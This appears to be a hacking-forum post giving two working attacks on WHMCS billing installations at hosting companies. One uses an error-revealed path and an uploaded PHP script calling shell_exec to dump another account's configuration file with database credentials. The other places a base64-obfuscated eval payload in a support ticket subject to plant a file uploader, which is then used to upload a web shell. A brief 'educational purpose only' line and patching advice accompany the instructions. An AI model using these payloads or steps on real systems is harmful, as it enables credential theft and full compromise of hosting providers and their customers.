You might need to spend a bit of money if you want this to work.
Go to your nulled host.
Append the following after their WHMCS directory (for example www.resellerrocket.com/am/)
includes/api/acceptorder.php
So the url is now http://www.resellerrocket.com/am/inc…cceptorder.php
Now, legit WHMCS has an extra check here and will not show the error. However if it is nulled, the check is removed and you get the info you need:
Warning: main(ROOTDIR/includes/orderfunctions.php) [function.main]: failed to open stream: No such file or directory in /home/reseller/public_html/am/includes/api/acceptorder.php on line 0 Warning: main(ROOTDIR/includes/orderfunctions.php) [function.main]: failed to open stream: No such file or directory in /home/reseller/public_html/am/includes/api/acceptorder.php on line 0 Fatal error: main() [function.require]: Failed opening required 'ROOTDIR/includes/orderfunctions.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/reseller/public_html/am/includes/api/acceptorder.php on line 0
Now, get hosting with them. Once you have it, upload a PHP file with these contents:
<?php
echo '<h1>WHMCS Pwner</h1>';
echo '<hr />';
echo '<pre>';
echo shell_exec('cat /home/reseller/public_html/am/configuration.php');
echo '</pre>';
echo '<hr />';
?> Now open it in your browser and if it works you will now have the username and password for it.
Enjoy.
Credit to timestandstill on HF
I just recently patched my version however most people that have nulled versions this would be a good way to compromise them.. This is for educational purpose only.. if you have whmcs you may want to consider patching it.
This exploit wasn’t founded by me.. I received numerous tickes with this code and decoded it to find out were the location was at and such.. I hope you enjoy and learn something from this..
(if you try this at my hosting company you’ll see I have a since of humor)
Step 1. put in support ticket put this in the subject line
{php}eval(base64_decode('JGMzbyA9IGJhc2U2NF9kZWNvZGUoIlBEOXdhSEFOQ21WamFHOGdKenhtYjNKdElHRmpkR2x2YmowaUlpQnRaWFJvYjJROUluQnZjM1FpSUdWdVkzUjVjR1U5SW0xMWJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFaUlHNWhiV1U5SW5Wd2JHOWhaR1Z5SWlCcFpEMGlkWEJzYjJGa1pYSWlQaWM3RFFwbFkyaHZJQ2M4YVc1d2RYUWdkSGx3WlQwaVptbHNaU0lnYm1GdFpUMGlabWxzWlNJZ2MybDZaVDBpTlRBaVBqeHBibkIxZENCdVlXMWxQU0pmZFhCc0lpQjBlWEJsUFNKemRXSnRhWFFpSUdsa1BTSmZkWEJzSWlCMllXeDFaVDBpVlhCc2IyRmtJajQ4TDJadmNtMCtKenNOQ21sbUtDQWtYMUJQVTFSYkoxOTFjR3duWFNBOVBTQWlWWEJzYjJGa0lpQXBJSHNOQ2dscFppaEFZMjl3ZVNna1gwWkpURVZUV3lkbWFXeGxKMTFiSjNSdGNGOXVZVzFsSjEwc0lDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmJtRnRaU2RkS1NrZ2V5QmxZMmh2SUNjOFlqNVZjR3h2WVdRZ1UxVkxVMFZUSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNnbGxiSE5sSUhzZ1pXTm9ieUFuUEdJK1ZYQnNiMkZrSUVkQlIwRk1JQ0VoSVR3dllqNDhZbkkrUEdKeVBpYzdJSDBOQ24wTkNqOCsiKTsNCiRyZWQgPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkcmVkLCRjM28pOw=='));{/php}
anything in the message line
Step 2. look in hostingsiteurl.com/billingsystem/templates_c/red.php (there should be uploader)
step 3. you could upload a shell compromise the whole site.
I hope I explained this you let me know your thoughts.
